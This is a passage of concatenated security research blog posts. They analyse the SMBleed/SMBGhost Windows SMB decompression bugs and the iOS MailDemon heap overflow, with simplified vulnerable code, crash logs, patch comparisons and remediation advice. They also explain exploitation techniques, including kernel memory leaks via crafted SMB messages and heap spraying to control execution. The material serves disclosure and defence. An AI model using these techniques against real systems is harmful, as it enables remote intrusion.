Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the uninitialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out of bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.
The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome the limitation with the previous technique, doing so required sending a large number of packets, hurting performance and stability.
ZecOps Detection
ZecOps classifies forensic logs related to this issue with the following tags: #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.
Remediation
You can remediate the impact of both issues by doing one of the following:
Applying the latest security updates (recommended)
Blocking port 445 / enforcing host isolation
Disabling SMBv3.1.1 compression
Part II – Summary
In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.
While looking at the vulnerable function of SMBGhost, we discovered another vulnerability: SMBleed (CVE-2020-1206).
SMBleed allows an attacker to leak kernel memory remotely.
Combined with SMBGhost, which was patched three months ago, SMBleed makes it possible to achieve pre-auth Remote Code Execution (RCE).
POC #1: SMBleed remote kernel memory read: POC #1 Link
POC #2: Pre-Auth RCE Combining SMBleed with SMBGhost: POC #2 Link
Introduction
The SMBGhost (CVE-2020-0796) bug in the compression mechanism of SMBv3.1.1 was fixed about three months ago. In our previous writeup we explained the bug, and demonstrated a way to exploit it for local privilege escalation. As we found during our research, it’s not the only bug in the SMB decompression functionality. SMBleed happens in the same function as SMBGhost. The bug allows an attacker to read uninitialized kernel memory, as we illustrated in detail in this writeup.
The bug happens in the same function as with SMBGhost, the Srv2DecompressData function in the srv2.sys SMB server driver. Below is a simplified version of the function, with the irrelevant details omitted:
The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero, it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.
The SMBGhost bug happened due to lack of integer overflow checks. It was fixed by Microsoft and even though we didn’t add it to our function to keep it simple, this time we will assume that the function checks for integer overflows and discards the message in these cases. Even with these checks in place, there’s still a serious bug. Can you spot it?
Faking OriginalCompressedSegmentSize again
Previously, we exploited SMBGhost by setting the OriginalCompressedSegmentSize field to be a huge number, causing an integer overflow followed by an out of bounds write. What if we set it to be a number which is just a little bit larger than the actual decompressed data we send? For example, if the size of our compressed data is x after decompression, and we set OriginalCompressedSegmentSize to be x + 0x1000, we’ll get the following:
The uninitialized kernel data is going to be treated as a part of our message.
If you didn’t read our previous writeup, you might think that the Srv2DecompressData function call should fail due to the check that follows the SmbCompressionDecompress call:
Specifically, in our example, you might assume that while the value of the OriginalCompressedSegmentSize field is x + 0x1000, FinalCompressedSize will be set to x in this case. In fact, FinalCompressedSize will be set to x + 0x1000 as well due to the implementation of the SmbCompressionDecompress function:
NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...
    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        // On success, the reported size is the size of the buffer,
        // not the number of bytes that were actually written.
        *FinalCompressedSize = CompressedBufferSize;
    }
    // ...
    return Status;
}
In case of a successful decompression, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. Not only did this seemingly unnecessary, deliberate update of the FinalCompressedSize value make the exploitation of SMBGhost easier, it also allowed the SMBleed bug to exist.
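The effect of that update can be modeled in a few lines of Python. This is a toy model under stated assumptions, not the driver's logic: zlib stands in for the SMB compression algorithms, the 0xAA filler stands in for stale pool memory, and the size comparison is our assumed form of the check that follows the decompression call. All names are ours.

```python
import zlib

STALE = 0xAA  # marker for bytes left over from an earlier allocation (assumption)


def decompress_model(compressed: bytes, dest: bytearray):
    """Toy model: decompress into dest and report a size the way the text describes."""
    data = zlib.decompress(compressed)
    if len(data) > len(dest):
        return -1, 0            # failure: output does not fit
    dest[:len(data)] = data
    # Mirrors '*FinalCompressedSize = CompressedBufferSize':
    # the size of the whole buffer is reported, not len(data).
    return 0, len(dest)


message = b"WRITE-HEADER"
x = len(message)
claimed_size = x + 0x1000                     # the faked size field
dest = bytearray([STALE]) * claimed_size      # "uninitialized" allocation

status, final_size = decompress_model(zlib.compress(message), dest)
check_passes = status >= 0 and final_size == claimed_size
leftover = bytes(dest[x:])                    # bytes never written by decompression

print(check_passes, len(leftover))
```

In this model the size check passes even though only x bytes were written, and the remaining 0x1000 bytes of the buffer keep whatever they held before, which is the part that ends up being treated as message data.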
Basic exploitation
The SMB message we used to demonstrate the vulnerability is the SMB2 WRITE message. The message structure contains fields such as the amount of bytes to write and flags, followed by a variable length buffer. That’s perfect for exploiting the bug, since we can craft a message such that we specify the header, but the variable length buffer contains uninitialized data. We based our POC on Microsoft’s WindowsProtocolTestSuites repository (that we also used for the first SMBGhost reproduction), introducing this small addition to the compression function:
Note that our POC requires credentials and a writable share, which are available in many scenarios, but the bug applies to every message, so it can potentially be exploited without authentication. Also note that the leaked memory is from previous allocations in the NonPagedPoolNx pool, and since we control the allocation size, we might be able to control the data that is being leaked to some degree.
Windows 10 versions 1903, 1909 and 2004 are affected. During testing, our POC crashed one of our Windows 10 1903 machines. After analyzing the crash with Neutrino, we saw that the earliest, unpatched versions of Windows 10 1903 have a null pointer dereference bug while handling valid, compressed SMB packets. Please note, we didn’t investigate further to find whether it’s possible to bypass the null pointer dereference bug and exploit the system.
Here’s a summary of the affected Windows versions with the relevant updates installed:
Windows 10 Version 2004
Update | SMBGhost | SMBleed
KB4557957 | Not Vulnerable | Not Vulnerable
Before KB4557957 | Not Vulnerable | Vulnerable
Windows 10 Version 1909
Update | SMBGhost | SMBleed
KB4560960 | Not Vulnerable | Not Vulnerable
KB4551762 | Not Vulnerable | Vulnerable
Before KB4551762 | Vulnerable | Vulnerable
Windows 10 Version 1903
Update | Null Dereference Bug | SMBGhost | SMBleed
KB4560960 | Fixed | Not Vulnerable | Not Vulnerable
KB4551762 | Fixed | Not Vulnerable | Vulnerable
KB4512941 | Fixed | Vulnerable | Vulnerable
None of the above | Not Fixed | Vulnerable | Potentially vulnerable*
* We haven’t tried to bypass the null dereference bug, but it may be possible through another method (for example, using SMBGhost Write-What-Where primitive)
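For defenders who want to check a fleet against the tables above, the same data can be expressed as a lookup. This is a minimal sketch: the dictionary is transcribed from the tables, while the function name and the notion of an "open issue" (anything not marked "Not Vulnerable" or "Fixed") are our own illustration.

```python
# Keys are (Windows 10 version, update level); values are transcribed from the tables.
PATCH_STATUS = {
    ("2004", "KB4557957"): {"SMBGhost": "Not Vulnerable", "SMBleed": "Not Vulnerable"},
    ("2004", "Before KB4557957"): {"SMBGhost": "Not Vulnerable", "SMBleed": "Vulnerable"},
    ("1909", "KB4560960"): {"SMBGhost": "Not Vulnerable", "SMBleed": "Not Vulnerable"},
    ("1909", "KB4551762"): {"SMBGhost": "Not Vulnerable", "SMBleed": "Vulnerable"},
    ("1909", "Before KB4551762"): {"SMBGhost": "Vulnerable", "SMBleed": "Vulnerable"},
    ("1903", "KB4560960"): {"Null Dereference Bug": "Fixed",
                            "SMBGhost": "Not Vulnerable", "SMBleed": "Not Vulnerable"},
    ("1903", "KB4551762"): {"Null Dereference Bug": "Fixed",
                            "SMBGhost": "Not Vulnerable", "SMBleed": "Vulnerable"},
    ("1903", "KB4512941"): {"Null Dereference Bug": "Fixed",
                            "SMBGhost": "Vulnerable", "SMBleed": "Vulnerable"},
    ("1903", "None of the above"): {"Null Dereference Bug": "Not Fixed",
                                    "SMBGhost": "Vulnerable",
                                    "SMBleed": "Potentially vulnerable*"},
}

SAFE = {"Not Vulnerable", "Fixed"}


def open_issues(version: str, update: str) -> list:
    """Return the issues that are not marked safe for the given version and update level."""
    row = PATCH_STATUS[(version, update)]
    return sorted(name for name, status in row.items() if status not in SAFE)


print(open_issues("1909", "KB4551762"))
```

A machine on version 1909 that only has KB4551762 is reported with SMBleed still open, matching the second table.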
SMBleedingGhost? Chaining SMBleed with SMBGhost for pre-auth RCE
Exploiting the SMBleed bug without authentication is less straightforward, but also possible. We were able to use it together with the SMBGhost bug to achieve RCE (Remote Code Execution). A writeup with the technical details will be published soon. For now, please see below a POC demonstrating the exploitation. This POC is released only for educational and research purposes, as well as for evaluation of security defenses. Use at your own risk. ZecOps takes no responsibility for any misuse of this POC.
ZecOps Neutrino customers detect exploitation of SMBleed & SMBGhost – no further action is required. SMBleed & SMBGhost can be detected in multiple ways, including crash dump analysis and network traffic analysis. Signatures are available to ZecOps Threat Intelligence subscribers. Feel free to reach out to us at [email protected] for more information.
Remediation
You can remediate both SMBleed and SMBGhost by doing one or more of the following things:
Windows update will solve the issues completely (recommended)
Blocking port 445 will stop lateral movements using these vulnerabilities
Enforcing host isolation
Disabling SMB 3.1.1 compression (not a recommended solution)
Shout out to Chompie, who exploited this bug with a different technique. Chompie’s POC is available here.
Further to Apple’s patch of the MailDemon vulnerability (see our blog here), ZecOps Research Team has analyzed and compared the MailDemon patches of iOS 13.4.5 beta and iOS 13.5.
Our analysis concluded that the patches are different, and that the iOS 13.4.5 beta patch was incomplete and could still be vulnerable under certain circumstances.
Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch utilising a different approach which fixed this issue completely on both iOS 13.5 and iOS 12.4.7 as a special security update for older devices.
This may explain why it took about one month for a full patch to be released.
iOS 13.4.5 beta patch
The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.
The function -[MFMutableData appendBytes:length:] raises an exception if -[MFMutableData _mapMutableData] returns false.
In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:
When mmap fails, the function returns False, but it still allocates an 8-byte chunk and stores the pointer in self->bytes. This patch raises an exception before copying data into self->bytes, which solves the heap overflow issue partially.
The patch makes sure an exception will be raised inside -[MFMutableData appendBytes:length:]. However, other functions also call -[MFMutableData _mapMutableData] and interact with self->bytes, which will be an 8-byte chunk if mmap fails. These functions do not check whether mmap failed, since the patch only affects -[MFMutableData appendBytes:length:].
Following is an actual backtrace taken from MobileMail:
The bytes returned by mutableBytes are usually considered to be modifiable, given the following from Apple’s documentation:
This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use the bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.
Apple’s documentation
Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] return self->bytes, which points to the 8-byte chunk if mmap fails. This might lead to a heap overflow under some circumstances.
The following is an example of how things could go wrong. The heap overflow would still happen even if the caller checks the length before memcpy:
size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
char* data = malloc(length);
[mdata initWithBytesNoCopy:data length:length];
size_t mdata_len = [mdata length];
char* mbytes = [mdata mutableBytes]; // mbytes could point to an 8-byte chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {
    memcpy(mbytes, new_data, new_data_len); // heap overflow if mmap failed
}
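The reason the length check does not help can be shown with a toy model. This is a sketch of the state described above, not Apple's implementation: the class and both helper functions are hypothetical, and the only facts taken from the text are the logical length of 0x30000, the 8-byte fallback chunk, and the 90-byte copy.

```python
class MutableDataModel:
    """Toy model: the logical length and the real backing size can disagree."""

    def __init__(self, logical_length: int, mmap_ok: bool):
        self.logical_length = logical_length
        # If mmap fails, the backing store is only the 8-byte fallback chunk.
        self.capacity = logical_length if mmap_ok else 8


def caller_check_passes(obj: MutableDataModel, n: int) -> bool:
    """The check from the example above: compares against the logical length."""
    return n <= obj.logical_length


def write_is_in_bounds(obj: MutableDataModel, n: int) -> bool:
    """What actually matters: compares against the real backing size."""
    return n <= obj.capacity


failed = MutableDataModel(0x30000, mmap_ok=False)
passes = caller_check_passes(failed, 90)
in_bounds = write_is_in_bounds(failed, 90)
overflow_bytes = max(0, 90 - failed.capacity)
print(passes, in_bounds, overflow_bytes)
```

In the failure case the caller's check passes while the write is out of bounds by 82 bytes, because the check and the copy look at two different sizes.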
iOS 13.5 Patch
Following the iOS 13.5 patch, an exception is raised in “-[MFMutableData _mapMutableData]” right after mmap fails, and the function no longer returns the 8-byte chunk. This approach fixes the issue completely.
Summary
The iOS 13.5 patch is the correct way to patch the heap overflow vulnerability. It is important to double check security patches and verify that the patch is complete.
At ZecOps we help developers find security weaknesses and automatically validate whether an issue was solved correctly. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program. If you do not own an app, and would like to inspect your phone for suspicious activity – check out ZecOps iOS DFIR solution – Gluon.
We were able to use this technique to verify that this vulnerability is exploitable. We are still working on improving the success rate.
Present two new examples of in-the-wild triggers so you can judge for yourself if these bugs are worth an out of band patch
Suggestions to Apple on how to improve forensics information / logs and important questions following Apple’s response to the previous disclosure
Launching a bounty program for people who have traces of attacks with total bounties of $27,337
MailDemon appears to be even more ancient than we initially thought. There was a trigger for this vulnerability in the wild 10 years ago, on an iPhone 2G running iOS 3.1.3
Following our announcement of RCE vulnerabilities discovery in the default Mail application on iOS, we have been contacted by numerous individuals who suspect they were targeted by this and related vulnerabilities in Mail.
ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.
At present, we already have the following:
Remote heap-overflow in Mail application
Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
Ability to alter code execution
Kernel Elevation of Privileges 0day
What we don’t have:
An infoleak – but therein rests a surprise: the infoleak does not have to be in Mail, since an infoleak in almost any other process would be sufficient. Because dyld_shared_cache is shared by most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail. For example, CVE-2019-8646 in iMessage can do the trick remotely as well, which opens additional attack surface (FaceTime, other apps, iMessage, etc.). There is a great talk by 5aelo at OffensiveCon covering similar topics.
Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious in chaining this together because:
We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at FreeTheSandbox.org
We haven’t seen exploitation in the wild for the LPE.
We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions.
Were you targeted by this vulnerability?
MailDemon Bounty
Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.
Exploiting MailDemon
As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.
Heap Spray & Heap Grooming Technique
In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.
The following is a partial crash log generated while testing our POC:
Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region. Bytes after previous region: 16045690973559045872
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
MALLOC_NANO 0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV
--->
UNUSED SPACE AT END
Thread 18 name: Dispatch queue: com.apple.CFNetwork.Connection
Thread 18 Crashed:
0 ??? 0xdeadbeefdeadbeef 0 + -2401053088876216593
1 libdispatch.dylib 0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp + 612
2 libdispatch.dylib 0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp + 480
3 libdispatch.dylib 0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp + 1960
4 libdispatch.dylib 0x00000001b773b4ac _dispatch_workloop_worker_thread + 596
5 libsystem_pthread.dylib 0x00000001b796a114 _pthread_wqthread + 304
6 libsystem_pthread.dylib 0x00000001b796ccd4 start_wqthread + 4
Thread 18 crashed with ARM Thread State (64-bit):
x0: 0x0000000281606300 x1: 0x00000001e4b97b04 x2: 0x0000000000000004 x3: 0x00000001b791df30
x4: 0x00000002827e81c0 x5: 0x0000000000000000 x6: 0x0000000106e5af60 x7: 0x0000000000000940
x8: 0x00000001f14a6f68 x9: 0x00000001e4b97b04 x10: 0x0000000110000ae0 x11: 0x000000130000001f
x12: 0x0000000110000b10 x13: 0x000001a1f14b0141 x14: 0x00000000ef02b800 x15: 0x0000000000000057
x16: 0x00000001f14b0140 x17: 0xdeadbeefdeadbeef x18: 0x0000000000000000 x19: 0x0000000108e68038
x20: 0x0000000108e68000 x21: 0x0000000108e68000 x22: 0x000000016ff3f0e0 x23: 0xa3a3a3a3a3a3a3a3
x24: 0x0000000282721140 x25: 0x0000000108e68038 x26: 0x000000016ff3eac0 x27: 0x00000002827e8e80
x28: 0x000000016ff3f0e0 fp: 0x000000016ff3e870 lr: 0x00000001b6f3db9c
sp: 0x000000016ff3e400 pc: 0xdeadbeefdeadbeef cpsr: 0x60000000
The ideal primitive for heap spray in this case is a memory leak bug that can be triggered remotely, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such a primitive could qualify for up to a $7,337 bounty from ZecOps (read more below).
Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.
Trigger
An oversized email is capable of reproducing the vulnerability as a PoC (see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]”:
-[MFMutableData appendBytes:length:]
{
    int old_len = [self length];
    //...
    char* bytes = self->bytes;
    if (!bytes) {
        bytes = [self _mapMutableData]; // Might be a pointer to an 8-byte heap chunk
    }
    copy_dst = bytes + old_len;
    //...
    memmove(copy_dst, append_bytes, append_length); // append_length is used for the copy, causing an OOB write on a small heap chunk
}
The destination address of memmove is “bytes + old_len” instead of “bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value, so the destination address would land at an invalid address beyond the edge of this region and the process would crash immediately, given that the size of the MALLOC_NANO region is 512MB.
In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.
Note that the “padding” doesn’t mean the overflow address is completely random. The “padding” is predictable for a given hardware model, since the RAM size is the same, and mmap usually failed at the same size during our tests.
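The constraint on “old_len” can be made concrete with a short calculation. This is only a sketch: the region bounds are taken from the MALLOC_NANO line of the crash log above, while the chunk pointer is a hypothetical example value inside that region and the helper names are ours.

```python
NANO_START = 0x0000000280000000  # MALLOC_NANO start, from the crash log above
NANO_END = 0x00000002A0000000    # MALLOC_NANO end, from the crash log above


def copy_destination(bytes_ptr: int, old_len: int) -> int:
    """Destination of the copy, as in 'copy_dst = bytes + old_len'."""
    return bytes_ptr + old_len


def lands_in_nano(address: int) -> bool:
    """True if the address falls inside the MALLOC_NANO region."""
    return NANO_START <= address < NANO_END


chunk_ptr = 0x0000000281606300   # hypothetical 8-byte chunk inside the region
max_old_len = NANO_END - chunk_ptr - 1

print(lands_in_nano(copy_destination(chunk_ptr, 0x1000)))       # small padding
print(lands_in_nano(copy_destination(chunk_ptr, 0x4A35630E)))   # ~1.2GB padding
print(hex(max_old_len))
```

Any “old_len” above the printed maximum pushes the destination past the end of the region, so the accumulated data has to stay well below 512MB for the overflow to hit MALLOC_NANO objects at all.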
Crash analysis
This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.
Case 1 shows that the vulnerability was triggered in the wild before it was disclosed.
Case 2 is due to memory corruption in the MALLOC_NANO region. The value of the corrupted memory is part of the sent email and completely controlled by the sender.
Case 1
The following crash was triggered right inside the vulnerable function while the overflow happens.
With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst”, 0x4a35630e, was an invalid address in the first place.
So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address.
It turns out that the process crashed after failing to mmap a file and then failing to allocate the 8-byte chunk at the same time.
The invalid address 0x4a35630e is actually the offset, which is the length of MFMutableData before triggering the vulnerability (i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”.
In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.
Please note that x8-x15, and x0 are fully controlled by the sender.
The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-byte chunk could fail, and the process could crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.
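The numbers in this case are easy to double check. The sketch below only redoes the arithmetic from the text, assuming a NULL base pointer as described; the MALLOC_NANO start address is taken from the crash log in the exploitation section.

```python
old_len = 0x4A35630E          # value of x0 in the crash
base = 0                      # calloc returned NULL
copy_dst = base + old_len     # 'copy_dst = bytes + old_len'

size_gb = old_len / 10**9     # decimal gigabytes
size_gib = old_len / 2**30    # binary gibibytes

NANO_START = 0x0000000280000000
print(hex(copy_dst), round(size_gb, 2), round(size_gib, 2), copy_dst < NANO_START)
```

The destination equals the accumulated length itself, roughly 1.2GB, and it sits far below the start of the MALLOC_NANO region.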
A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!
Vulnerable version: iOS 3.1.3 on iPhone 2G Time of crash: 22nd of October, 2010
The user “shyamsandeep” registered on the 12th of June 2008, last logged in on the 16th of October 2011, and had a single post in the forum, which contained this exact trigger.
This crash had r0 equal to 0x037ea000, which could be the result of the first vulnerability we disclosed in our previous blog, which was due to an ftruncate() failure. Interestingly, as we explained in the first case, it could also be the result of a failure to allocate the 8-byte chunk. However, it is not possible to determine the exact reason, since the log lacked memory region information. Nonetheless, it is certain that triggers for this exploitable vulnerability have existed in the wild since 2010.
[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode.
[b] is one of the instructions around the crashed address, which we’ve added for better understanding. The process crashed on the instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one of the objects.
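The reading of the overwritten pointer in [a] can be verified quickly. The snippet is a small sketch that assumes the value is stored little-endian, as on arm64, and interprets its eight bytes as UTF-16 text; the function name is ours.

```python
def pointer_as_utf16(value: int) -> str:
    """Interpret a 64-bit value as four little-endian UTF-16 code units."""
    return value.to_bytes(8, "little").decode("utf-16-le")


text = pointer_as_utf16(0x0041004100410041)
print(text)
```

The result is the string "AAAA", which is consistent with the pointer having been overwritten by text taken from the email.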
By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.
Let’s take a look at the virtual memory region information of x28 (0x0000000282693330). The overwritten object was stored in the MALLOC_NANO region, which stores small heap chunks. The heap overflow vulnerability corrupts the same region, since it overflows an 8-byte heap chunk which is also stored in MALLOC_NANO.
This crash is actually pretty close to controlling the PC, since it controls the pointer of an Objective-C object. By pointing the value of register x0 to memory sprayed with a fake object and a class with a fake method cache, the attackers could control the PC. This phrack blog explains the details.
Summary
It is rare to see that user-provided inputs trigger and control remote vulnerabilities.
We prove that it is possible to exploit this vulnerability using the described technique.
We have observed real world triggers with a large allocation size.
We have seen real world triggers with values that are controlled by the sender.
The emails we looked for were missing / deleted.
Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
In our opinion, based on the above, this bug is worth an out of band patch.
How Can Apple Improve the Logs?
The lack of details in iOS logs and the lack of options to choose the granularity of the data for both individuals and organizations need to change to get iOS to be on par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it is completely flawed and should not be the normal way to do it.
We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:
Crashes improvement: Make it possible to see memory next to each pointer / register
Crashes improvement: Show stack / heap memory / memory near registers
Add PIDs/PPIDs/UID/EUID to all applicable events
Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.
Questions for Apple
How many triggers have you seen for this heap overflow since iOS 3.1.3?
How were you able to determine within one day that all of the triggers to this bug were not malicious, and did you actually go over each event?
When are you planning to patch this vulnerability?
What are you going to do about enhancing forensics on mobile devices (see the list above)?
MailDemon Bounty
If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address [email protected]– there are instructions at the bottom of this post.
Suspected emails may appear as follows:
Bounty details: We will validate whether the email contains exploit code. For the first two submissions containing Mail exploits that are verified by the ZecOps team, we will provide:
$10,000 USD bounty
One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year.
We will provide an additional bounty of up to $7,337 for exploit primitive as described above.
We will determine the first two valid submissions according to the date they were received by our email server and whether they contain exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino.
For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.
Please note: Not every email that causes the symptoms above and is shared with us will qualify for a bounty, as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.
How to send the emails using Outlook:
Open Outlook from a computer and locate the relevant email